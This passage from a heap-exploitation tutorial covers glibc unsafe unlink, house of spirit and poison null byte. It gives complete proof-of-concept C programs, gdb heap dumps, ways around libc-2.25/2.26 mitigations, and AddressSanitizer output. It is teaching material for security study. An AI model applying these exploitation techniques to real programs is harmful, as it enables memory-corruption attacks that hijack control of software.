0x602110: 0x0000000000000000 0x0000000000000000
0x602120: 0x0000000000000000 0x0000000000020ee1 <-- top chunk
0x602130: 0x0000000000000000 0x0000000000000000
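Next we need to pass the check (P->fd->bk != P || P->bk->fd != P) == False. The weakness of this check is that fd and bk are located purely by their offsets from the chunk header. We can therefore use the global pointer chunk0_ptr to build a fake chunk that passes it: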
gef➤ x/40gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 0
0x602010: 0x0000000000000000 0x0000000000000000 <-- fake chunk P
0x602020: 0x0000000000601058 0x0000000000601060 <-- fd, bk pointer
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000000
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000080 0x0000000000000090 <-- chunk 1 <-- prev_size
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000000000
0x6020c0: 0x0000000000000000 0x0000000000000000
0x6020d0: 0x0000000000000000 0x0000000000000000
0x6020e0: 0x0000000000000000 0x0000000000000000
0x6020f0: 0x0000000000000000 0x0000000000000000
0x602100: 0x0000000000000000 0x0000000000000000
0x602110: 0x0000000000000000 0x0000000000000000
0x602120: 0x0000000000000000 0x0000000000020ee1 <-- top chunk
0x602130: 0x0000000000000000 0x0000000000000000
gef➤ x/5gx 0x601058
0x601058: 0x0000000000000000 0x00007ffff7dd2540 <-- fake chunk FD
0x601068: 0x0000000000000000 0x0000000000602010 <-- bk pointer
0x601078: 0x0000000000000000
gef➤ x/5gx 0x601060
0x601060: 0x00007ffff7dd2540 0x0000000000000000 <-- fake chunk BK
0x601070: 0x0000000000602010 0x0000000000000000 <-- fd pointer
0x601080: 0x0000000000000000
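As shown, we build a fake chunk inside chunk0, denoted P. Its fd and bk pointers form two chains, P->fd->bk == P and P->bk->fd == P, so the check passes. In addition, using an overflow in chunk0, we set the prev_size of chunk 1 to the size of the fake chunk and clear its PREV_INUSE bit, which makes the fake chunk look like a free chunk.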
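The values written into the fake chunk follow directly from the field offsets. As a small sketch, assuming the 64-bit malloc_chunk layout (prev_size, size, fd, bk at offsets 0, 8, 16, 24), the helpers below compute them from the address of the slot that stores the pointer. The toy_ names are hypothetical and exist only for this illustration.

```c
#include <stdint.h>

/* Assumed offsets of fd and bk inside a 64-bit malloc_chunk. */
#define TOY_FD_OFFSET 16u
#define TOY_BK_OFFSET 24u

/* fd value chosen so that fd->bk is the slot that stores the pointer. */
uint64_t toy_fake_fd(uint64_t ptr_slot_addr)
{
    return ptr_slot_addr - TOY_BK_OFFSET;
}

/* bk value chosen so that bk->fd is the slot that stores the pointer. */
uint64_t toy_fake_bk(uint64_t ptr_slot_addr)
{
    return ptr_slot_addr - TOY_FD_OFFSET;
}

/* Size field of the next chunk with the PREV_INUSE bit cleared. */
uint64_t toy_clear_prev_inuse(uint64_t size_field)
{
    return size_field & ~(uint64_t)1;
}
```

With the pointer slot at 0x601070, as in the dump above, this gives fd = 0x601058 and bk = 0x601060, and the size field of chunk 1 changes from 0x91 to 0x90.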
The next step is to free chunk1. This triggers an unlink of the fake chunk and overwrites the value of chunk0_ptr. The unlink operation proceeds as follows:
FD = P->fd;
BK = P->bk;
FD->bk = BK;
BK->fd = FD;
Given the offsets of fd and bk inside the malloc_chunk structure, this is equivalent to:
FD = P->fd = &P - 24
BK = P->bk = &P - 16
FD->bk = *(&P - 24 + 24) = P
BK->fd = *(&P - 16 + 16) = P
This passes the unlink check, and the net effect is:
FD->bk = P = BK = &P - 16
BK->fd = P = FD = &P - 24
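The pointer P, which originally pointed to the fake chunk on the heap, now points to its own address minus 24. If the program lets us write through P, we can overwrite the pointer P itself and from there write to arbitrary memory. If the program lets us read through P, we get an information leak.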
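The effect can be reproduced safely on ordinary arrays instead of the real heap. The following sketch treats a chunk as an array of machine words (fd at word index 2, bk at word index 3, which assumes the usual malloc_chunk layout) and applies the libc-2.23 style list check. toy_unlink and toy_unlink_demo are hypothetical names; slots[3] plays the role of chunk0_ptr.

```c
#include <stdint.h>

#define TOY_FD 2   /* word index of fd in a chunk */
#define TOY_BK 3   /* word index of bk in a chunk */

/* Unlink the chunk at p (an array of machine words) with the libc-2.23
   style list check. Returns 0 on success, -1 if the check fails. */
int toy_unlink(uintptr_t *p)
{
    uintptr_t *fd = (uintptr_t *)p[TOY_FD];
    uintptr_t *bk = (uintptr_t *)p[TOY_BK];
    if (fd[TOY_BK] != (uintptr_t)p || bk[TOY_FD] != (uintptr_t)p)
        return -1;
    fd[TOY_BK] = (uintptr_t)bk;
    bk[TOY_FD] = (uintptr_t)fd;
    return 0;
}

/* Build the fake chunk around a pointer slot and unlink it. Returns 1 when
   the slot ends up pointing three words below its own address. */
int toy_unlink_demo(void)
{
    uintptr_t fake[4] = {0, 0, 0, 0};
    uintptr_t slots[5] = {0, 0, 0, 0, 0};   /* slots[3] plays chunk0_ptr */

    slots[3] = (uintptr_t)fake;
    fake[TOY_FD] = (uintptr_t)&slots[0];    /* address of slot minus 3 words */
    fake[TOY_BK] = (uintptr_t)&slots[1];    /* address of slot minus 2 words */

    if (toy_unlink(fake) != 0)
        return 0;
    return slots[3] == (uintptr_t)&slots[0];
}
```

Both writes in toy_unlink land on slots[3]; the second one wins, so the pointer slot finally holds the address three words below itself, which is the same outcome as chunk0_ptr pointing to its own address minus 24.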
In this example, P->fd->bk and P->bk->fd both refer to P, so the final result is:
chunk0_ptr = P = P->fd
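chunk0_ptr has been modified successfully, and chunk0_ptr and chunk0_ptr[3] now refer to the same thing. This may be confusing at first. The pointer chunk0_ptr is stored in the data segment at 0x601070 and now points to 0x601058, while chunk0_ptr[3] means the third 8-byte slot counted from where chunk0_ptr points, so its address is 0x601058+0x08*3=0x601070: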
gef➤ x/40gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 0
0x602010: 0x0000000000000000 0x0000000000020ff1 <-- fake chunk P
0x602020: 0x0000000000601058 0x0000000000601060 <-- fd, bk pointer
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000000
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000080 0x0000000000000090 <-- chunk 1 [be freed]
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000000000
0x6020c0: 0x0000000000000000 0x0000000000000000
0x6020d0: 0x0000000000000000 0x0000000000000000
0x6020e0: 0x0000000000000000 0x0000000000000000
0x6020f0: 0x0000000000000000 0x0000000000000000
0x602100: 0x0000000000000000 0x0000000000000000
0x602110: 0x0000000000000000 0x0000000000000000
0x602120: 0x0000000000000000 0x0000000000020ee1 <-- top chunk
0x602130: 0x0000000000000000 0x0000000000000000
gef➤ x/5gx 0x601058
0x601058: 0x0000000000000000 0x00007ffff7dd2540 <-- fake chunk FD
0x601068: 0x0000000000000000 0x0000000000601058 <-- bk pointer
0x601078: 0x0000000000000000
gef➤ x/5gx 0x601060
0x601060: 0x00007ffff7dd2540 0x0000000000000000 <-- fake chunk BK
0x601070: 0x0000000000601058 0x0000000000000000 <-- fd pointer
0x601080: 0x0000000000000000
gef➤ x/gx chunk0_ptr
0x601058: 0x0000000000000000
gef➤ x/gx chunk0_ptr[3]
0x601058: 0x0000000000000000
So modifying chunk0_ptr[3] is the same as modifying chunk0_ptr:
gef➤ x/5gx 0x601058
0x601058: 0x0000000000000000 0x00007ffff7dd2540
0x601068: 0x0000000000000000 0x00007fffffffdc70 <-- chunk0_ptr[3]
0x601078: 0x0000000000000000
gef➤ x/gx chunk0_ptr
0x7fffffffdc70: 0x4141414141414141
chunk0_ptr now points to victim_string. Modify it:
gef➤ x/gx chunk0_ptr
0x7fffffffdc70: 0x4242424242424242
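We have achieved a write to an arbitrary address.
Finally, something newer: libc-2.25 adds a chunk_size == next->prev->chunk_size check at the beginning of unlink to counter single-byte overflows. The patch is as follows: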
$ git show 17f487b7afa7cd6c316040f3e6c86dc96b2eec30 malloc/malloc.c
commit 17f487b7afa7cd6c316040f3e6c86dc96b2eec30
Author: DJ Delorie <dj@delorie.com>
Date: Fri Mar 17 15:31:38 2017 -0400
Further harden glibc malloc metadata against 1-byte overflows.
Additional check for chunk_size == next->prev->chunk_size in unlink()
2017-03-17 Chris Evans <scarybeasts@gmail.com>
* malloc/malloc.c (unlink): Add consistency check between size and
next->prev->size, to further harden against 1-byte overflows.
diff --git a/malloc/malloc.c b/malloc/malloc.c
index e29105c372..994a23248e 100644
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -1376,6 +1376,8 @@ typedef struct malloc_chunk *mbinptr;
/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) { \
+ if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \
+ malloc_printerr (check_action, "corrupted size vs. prev_size", P, AV); \
FD = P->fd; \
BK = P->bk; \
if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
The macros involved are defined as follows:
/* Ptr to next physical malloc_chunk. */
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
/* Like chunksize, but do not mask SIZE_BITS. */
#define chunksize_nomask(p) ((p)->mchunk_size)
/* Size of the chunk below P. Only valid if prev_inuse (P). */
#define prev_size(p) ((p)->mchunk_prev_size)
/* Bits to mask off when extracting size */
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
Let's review the forged heap:
gef➤ x/40gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 0
0x602010: 0x0000000000000000 0x0000000000000000 <-- fake chunk P
0x602020: 0x0000000000601058 0x0000000000601060 <-- fd, bk pointer
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000000
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000080 0x0000000000000090 <-- chunk 1 <-- prev_size
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000000000
0x6020c0: 0x0000000000000000 0x0000000000000000
0x6020d0: 0x0000000000000000 0x0000000000000000
0x6020e0: 0x0000000000000000 0x0000000000000000
0x6020f0: 0x0000000000000000 0x0000000000000000
0x602100: 0x0000000000000000 0x0000000000000000
0x602110: 0x0000000000000000 0x0000000000000000
0x602120: 0x0000000000000000 0x0000000000020ee1 <-- top chunk
0x602130: 0x0000000000000000 0x0000000000000000
There are three ways to bypass this check:
- Do nothing.
chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x0
prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x0) == 0x0
- Set chunk0_ptr[1] = 0x8.
chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x8
prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x8) == 0x8
- Set chunk0_ptr[1] = 0x80.
chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x80
prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x80) == 0x80
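The three cases can be checked mechanically. The sketch below models the check chunksize(P) == prev_size(next_chunk(P)) on a plain buffer of 64-bit words, where word 0 of a chunk is prev_size and word 1 is size. toy_size_check is a hypothetical helper, and the bounds handling is an addition for safety that the real macro does not have.

```c
#include <stddef.h>
#include <stdint.h>

#define TOY_SIZE_BITS 0x7ULL   /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */

/* Model of the check chunksize(P) == prev_size(next_chunk(P)).
   p points at the fake chunk header inside a buffer of nwords 64-bit words.
   Returns 1 if the check passes, 0 if it fails, and -1 if next_chunk(P)
   would fall outside the buffer. */
int toy_size_check(const uint64_t *p, size_t nwords)
{
    uint64_t size;
    uint64_t next_index;

    if (nwords < 2)
        return -1;
    size = p[1] & ~TOY_SIZE_BITS;       /* chunksize(P) */
    next_index = size / 8;              /* next_chunk(P) as a word index */
    if (next_index >= nwords)
        return -1;
    return p[next_index] == size;       /* prev_size is word 0 of the next chunk */
}
```

With a size of 0 the next chunk is P itself, with 0x8 its prev_size overlaps P's own size field, and with 0x80 the prev_size is the field already forged in front of chunk 1, so all three pass in this model.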
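Good, the exploit now works on libc-2.25 as well. Going one step further, how do we exploit libc-2.26? First we need to know which new mechanisms and mitigations it introduced. One of them is tcache, a per-thread caching mechanism: by default each thread has 64 bins of increasing size, each bin is a singly linked list, and each bin holds at most 7 chunks by default. Chunks cached in tcache are not consolidated, so when chunk 1 is freed, chunk0_ptr still points to the original heap address instead of becoming chunk0_ptr = P = P->fd as before. One possible way around this is to fill the bin for that size with chunks first, like this: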
// deal with tcache
int *a[10];
int i;
for (i = 0; i < 7; i++) {
a[i] = malloc(0x80);
}
for (i = 0; i < 7; i++) {
free(a[i]);
}
gef➤ p &chunk0_ptr
$2 = (uint64_t **) 0x555555755070 <chunk0_ptr>
gef➤ x/gx 0x555555755070
0x555555755070 <chunk0_ptr>: 0x00007fffffffdd0f
gef➤ x/gx 0x00007fffffffdd0f
0x7fffffffdd0f: 0x4242424242424242
The exploit now works on libc-2.26 too. tcache is an interesting mechanism, and we cover it in detail in a dedicated chapter.
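Why seven frees are enough can be sketched with a small counter model. It assumes the defaults described above (64 bins, 7 chunks per bin) and a bin index computed as in glibc's csize2tidx macro with MINSIZE = 0x20 and 16-byte alignment. The struct and function names are hypothetical.

```c
#include <stddef.h>

#define TOY_MINSIZE      0x20UL
#define TOY_ALIGNMENT    0x10UL
#define TOY_TCACHE_BINS  64
#define TOY_TCACHE_COUNT 7

/* Only the per-bin counters are modeled, not the cached chunks themselves. */
struct toy_tcache {
    unsigned counts[TOY_TCACHE_BINS];
};

/* Map a chunk size to a tcache bin index, following csize2tidx(). */
size_t toy_csize2tidx(size_t chunk_size)
{
    return (chunk_size - TOY_MINSIZE + TOY_ALIGNMENT - 1) / TOY_ALIGNMENT;
}

/* Returns 1 if a freed chunk of this size would be cached in tcache, and 0
   if the bin is full or the size is out of range, in which case free falls
   through to the normal path (where unlink can happen). */
int toy_tcache_free(struct toy_tcache *tc, size_t chunk_size)
{
    size_t idx;

    if (chunk_size < TOY_MINSIZE)
        return 0;
    idx = toy_csize2tidx(chunk_size);
    if (idx >= TOY_TCACHE_BINS || tc->counts[idx] >= TOY_TCACHE_COUNT)
        return 0;
    tc->counts[idx]++;
    return 1;
}
```

In this model the first seven frees of a 0x90-byte chunk are absorbed by the tcache, and only the eighth falls through to the path that consolidates and unlinks, which is why the exploit frees seven filler chunks before freeing chunk1.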
Recompile with AddressSanitizer enabled and the heap-buffer-overflow is reported:
$ gcc -fsanitize=address -g unsafe_unlink.c
$ ./a.out
The global chunk0_ptr is at 0x602230, pointing to 0x60c00000bf80
The victim chunk we are going to corrupt is at 0x60c00000bec0
Fake chunk fd: 0x602218
Fake chunk bk: 0x602220
=================================================================
==5591==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000beb0 at pc 0x000000400d74 bp 0x7ffd06423730 sp 0x7ffd06423720
WRITE of size 8 at 0x60c00000beb0 thread T0
#0 0x400d73 in main /home/firmy/how2heap/unsafe_unlink.c:26
#1 0x7fc925d8282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#2 0x400968 in _start (/home/firmy/how2heap/a.out+0x400968)
0x60c00000beb0 is located 16 bytes to the left of 128-byte region [0x60c00000bec0,0x60c00000bf40)
allocated by thread T0 here:
#0 0x7fc9261c4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x400b12 in main /home/firmy/how2heap/unsafe_unlink.c:13
#2 0x7fc925d8282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
house_of_spirit
#include <stdio.h>
#include <stdlib.h>
int main() {
malloc(1);
fprintf(stderr, "We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.\n");
unsigned long long *a, *b;
unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));
fprintf(stderr, "The first one: %p\n", &fake_chunks[0]);
fprintf(stderr, "The second one: %p\n", &fake_chunks[4]);
fake_chunks[1] = 0x20; // the size
fake_chunks[5] = 0x1234; // nextsize
fake_chunks[2] = 0x4141414141414141LL;
fake_chunks[6] = 0x4141414141414141LL;
fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[0]);
a = &fake_chunks[2];
fprintf(stderr, "Freeing the overwritten pointer.\n");
free(a);
fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[0], &fake_chunks[2]);
b = malloc(0x10);
fprintf(stderr, "malloc(0x10): %p\n", b);
b[0] = 0x4242424242424242LL;
}
$ gcc -g house_of_spirit.c
$ ./a.out
We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.
The first one: 0x7ffc782dae00
The second one: 0x7ffc782dae20
Overwritting our pointer with the address of the fake region inside the fake first chunk, 0x7ffc782dae00.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7ffc782dae00, which will be 0x7ffc782dae10!
malloc(0x10): 0x7ffc782dae10
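house-of-spirit is a fastbin attack: we forge a fake chunk and free it, so that the next malloc returns the address of the fake chunk, that is, any region we control. It can be seen as a way of using the heap's fast bin mechanism to assist a stack overflow. An ordinary stack overflow exploit aims to overwrite the function's return address and hijack control flow through EIP. If the overflow is too short to reach the return address but can overwrite a heap pointer on the stack that is about to be freed, we can redirect that pointer to a stack address and forge fast bin chunk metadata at the corresponding location. When free is called, this chunk on the stack is placed in a fast bin, and on the next malloc of the matching size the LIFO behavior of fast bins returns it to the user; a subsequent write into it may then overwrite the return address. So the first step of the exploit is not to control a chunk but to control the pointer passed to free and point it at a fake chunk. Forging the fake chunk is therefore the key.
First, malloc(1) initializes the heap, and then two chunks are forged in the fake chunk region. As mentioned above, we also need a modifiable pointer that is passed to free, whether it is modified through a stack overflow or by some other means: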
gef➤ x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000 0x0000000000000020 <-- fake chunk 1
0x7fffffffdcc0: 0x4141414141414141 0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001 0x0000000000001234 <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141 0x0000000000000000
gef➤ x/gx &a
0x7fffffffdca0: 0x0000000000000000
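Forging a chunk requires passing several checks. First, the flag bits: PREV_INUSE does not affect the free path, but IS_MMAPPED and NON_MAIN_ARENA must both be zero. Second, on a 64-bit system the size of a fast chunk must be between 32 and 128 bytes. Finally, the size of the next chunk must be greater than 2*SIZE_SZ (that is, greater than 16) and less than av->system_mem (that is, less than roughly 128 KB) to pass the next-chunk size check.
In libc-2.23 these checks are implemented as follows: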
void
__libc_free (void *mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */
[...]
p = mem2chunk (mem);
if (chunk_is_mmapped (p)) /* release mmapped memory. */
{
[...]
munmap_chunk (p);
return;
}
ar_ptr = arena_for_chunk (p); // get the address of the arena that owns the chunk
_int_free (ar_ptr, p, 0); // called when IS_MMAPPED is zero
}
mem is the address we control that gets passed to free. The following two macros convert between chunk pointers and malloc (user) pointers:
/* conversion from malloc headers to user pointers, and back */
#define chunk2mem(p) ((void*)((char*)(p) + 2*SIZE_SZ))
#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
When NON_MAIN_ARENA is zero, the main arena is returned:
/* find the heap and corresponding arena for a given ptr */
#define heap_for_ptr(ptr) \
((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1)))
#define arena_for_chunk(ptr) \
(chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena)
In this way the program enters the _int_free function:
static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
INTERNAL_SIZE_T size; /* its size */
mfastbinptr *fb; /* associated fastbin */
[...]
size = chunksize (p);
[...]
/*
If eligible, place chunk on a fastbin so it can be found
and used quickly in malloc.
*/
if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
#if TRIM_FASTBINS
/*
If TRIM_FASTBINS set, don't place chunks
bordering top into fastbins
*/
&& (chunk_at_offset(p, size) != av->top)
#endif
) {
if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (chunksize (chunk_at_offset (p, size))
>= av->system_mem, 0))
{
[...]
errstr = "free(): invalid next size (fast)";
goto errout;
}
[...]
set_fastchunks(av);
unsigned int idx = fastbin_index(size);
fb = &fastbin (av, idx);
/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
mchunkptr old = *fb, old2;
[...]
do
{
[...]
p->fd = old2 = old;
}
while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
The following macro is used to obtain the next chunk:
/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s)))
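The conditions quoted above can be condensed into one predicate. This is a sketch under stated assumptions: 64-bit sizes, a fast chunk range of 0x20 to 0x80, and only the checks discussed in this section (the real _int_free performs further checks, such as alignment). toy_fake_chunk_ok is a hypothetical name, and system_mem is passed in by the caller rather than read from an arena.

```c
#include <stdint.h>

#define TOY_IS_MMAPPED     0x2ULL
#define TOY_NON_MAIN_ARENA 0x4ULL
#define TOY_SIZE_BITS      0x7ULL
#define TOY_SIZE_SZ        8ULL
#define TOY_MIN_FAST       0x20ULL   /* smallest chunk size on 64-bit */
#define TOY_MAX_FAST       0x80ULL   /* assumed default fastbin limit */

/* Returns 1 if a forged size field and next-chunk size field would pass the
   checks discussed in this section, 0 otherwise. */
int toy_fake_chunk_ok(uint64_t size_field, uint64_t next_size_field,
                      uint64_t system_mem)
{
    uint64_t size = size_field & ~TOY_SIZE_BITS;

    /* IS_MMAPPED and NON_MAIN_ARENA must be clear; PREV_INUSE is ignored. */
    if (size_field & (TOY_IS_MMAPPED | TOY_NON_MAIN_ARENA))
        return 0;
    /* The chunk must fall in the fastbin size range. */
    if (size < TOY_MIN_FAST || size > TOY_MAX_FAST)
        return 0;
    /* Next chunk: raw size field > 2*SIZE_SZ and chunksize < system_mem. */
    if (next_size_field <= 2 * TOY_SIZE_SZ)
        return 0;
    if ((next_size_field & ~TOY_SIZE_BITS) >= system_mem)
        return 0;
    return 1;
}
```

For the values used in the example program (size 0x20, next size 0x1234) and a system_mem of 0x21000, the predicate accepts the fake chunk; setting either of the two forbidden flag bits or using a next size of 0x10 makes it fail.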
Next, pointer a is changed to point to (fake chunk 1 + 0x10), which is the mem mentioned above, and is passed to free. The program mistakes it for a real chunk, frees it, and adds it to the fastbin.
gef➤ x/gx &a
0x7fffffffdca0: 0x00007fffffffdcc0
gef➤ x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000 0x0000000000000020 <-- fake chunk 1 [be freed]
0x7fffffffdcc0: 0x0000000000000000 0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001 0x0000000000001234 <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141 0x0000000000000000
0x7fffffffdcf0: 0x0000000000400820 0x00000000004005b0
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x7fffffffdcc0, size=0x20, flags=)
If we now malloc a fast chunk of the matching size, the program hands out this freed chunk from the fastbins.
gef➤ x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000 0x0000000000000020 <-- new chunk
0x7fffffffdcc0: 0x4242424242424242 0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001 0x0000000000001234 <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141 0x0000000000000000
0x7fffffffdcf0: 0x0000000000400820 0x00000000004005b0
gef➤ x/gx &b
0x7fffffffdca8: 0x00007fffffffdcc0
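So the main purpose of house-of-spirit is this: when the fake chunk we forge contains a region we cannot control directly, the technique turns that region into one we can control. Above, the fake chunk was filled with letters to make it easy to observe, but in practice those positions are likely to be uncontrollable, and house-of-spirit exists precisely for that situation.
The drawback of the technique is that it requires a stack address leak; otherwise the heap pointer that is about to be freed cannot be overwritten correctly. The forged data must also satisfy the alignment requirements.
Recompile with AddressSanitizer enabled and the problem becomes visible: the program tries to free a chunk that was not allocated by malloc: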
$ gcc -fsanitize=address -g house_of_spirit.c
$ ./a.out
We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.
The first one: 0x7fffa61d6c00
The second one: 0x7fffa61d6c20
Overwritting our pointer with the address of the fake region inside the fake first chunk, 0x7fffa61d6c00.
Freeing the overwritten pointer.
=================================================================
==5282==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x7fffa61d6c10 in thread T0
#0 0x7fc4c3a332ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x400cab in main /home/firmyy/how2heap/house_of_spirit.c:24
#2 0x7fc4c35f182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#3 0x4009b8 in _start (/home/firmyy/how2heap/a.out+0x4009b8)
For exploiting house-of-spirit on libc-2.26, see section 4.14.
3.1.7 Linux Heap Exploitation (Part 2)
how2heap
poison_null_byte
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
int main() {
uint8_t *a, *b, *c, *b1, *b2, *d;
a = (uint8_t*) malloc(0x10);
int real_a_size = malloc_usable_size(a);
fprintf(stderr, "We allocate 0x10 bytes for 'a': %p\n", a);
fprintf(stderr, "'real' size of 'a': %#x\n", real_a_size);
b = (uint8_t*) malloc(0x100);
c = (uint8_t*) malloc(0x80);
fprintf(stderr, "b: %p\n", b);
fprintf(stderr, "c: %p\n", c);
uint64_t* b_size_ptr = (uint64_t*)(b - 0x8);
*(size_t*)(b+0xf0) = 0x100;
fprintf(stderr, "b.size: %#lx ((0x100 + 0x10) | prev_in_use)\n\n", *b_size_ptr);
// deal with tcache
// int *k[10], i;
// for (i = 0; i < 7; i++) {
// k[i] = malloc(0x100);
// }
// for (i = 0; i < 7; i++) {
// free(k[i]);
// }
free(b);
uint64_t* c_prev_size_ptr = ((uint64_t*)c) - 2;
fprintf(stderr, "After free(b), c.prev_size: %#lx\n", *c_prev_size_ptr);
a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG"
fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
fprintf(stderr, "b.size: %#lx\n\n", *b_size_ptr);
fprintf(stderr, "Pass the check: chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n", *((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8))));
b1 = malloc(0x80);
memset(b1, 'A', 0x80);
fprintf(stderr, "We malloc 'b1': %p\n", b1);
fprintf(stderr, "c.prev_size: %#lx\n", *c_prev_size_ptr);
fprintf(stderr, "fake c.prev_size: %#lx\n\n", *(((uint64_t*)c)-4));
b2 = malloc(0x40);
memset(b2, 'A', 0x40);
fprintf(stderr, "We malloc 'b2', our 'victim' chunk: %p\n", b2);
// deal with tcache
// for (i = 0; i < 7; i++) {
// k[i] = malloc(0x80);
// }
// for (i = 0; i < 7; i++) {
// free(k[i]);
// }
free(b1);
free(c);
fprintf(stderr, "Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");
d = malloc(0x110);
fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2': %p\n\n", d);
fprintf(stderr, "b2 content:%s\n", b2);
memset(d, 'B', 0xb0);
fprintf(stderr, "New b2 content:%s\n", b2);
}
$ gcc -g poison_null_byte.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0xabb010
'real' size of 'a': 0x18
b: 0xabb030
c: 0xabb140
b.size: 0x111 ((0x100 + 0x10) | prev_in_use)
After free(b), c.prev_size: 0x110
We overflow 'a' with a single null byte into the metadata of 'b'
b.size: 0x100
Pass the check: chunksize(P) == 0x100 == 0x100 == prev_size (next_chunk(P))
We malloc 'b1': 0xabb030
c.prev_size: 0x110
fake c.prev_size: 0x70
We malloc 'b2', our 'victim' chunk: 0xabb0c0
Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').
Finally, we allocate 'd', overlapping 'b2': 0xabb030
b2 content:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
New b2 content:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
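This technique applies when some malloc'ed memory region has a single-byte overflow. By overflowing into the size field of the next chunk, an attacker can create overlapping chunks on the heap and use them to overwrite other data. Combined with other techniques, this can again lead to control of the program.
Single-byte overflows can be exploited in the following ways: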
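- Extending a freed chunk: when the chunk after the overflowing chunk is free and sits in the unsorted bin, a one-byte overflow can enlarge its size. The next time this chunk is allocated, it covers the chunk that follows it, which leads to a further overflow.
  0x100   0x100    0x80
|-------|-------|-------|
|   A   |   B   |   C   |   initial state
|-------|-------|-------|
|   A   |   B   |   C   |   free B
|-------|-------|-------|
|   A   |   B   |   C   |   overflow: set B's size to 0x180
|-------|-------|-------|
|   A   |   B   |   C   |   malloc(0x180-8)
|-------|-------|-------|   chunk C is overwritten
        |<- allocated ->|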
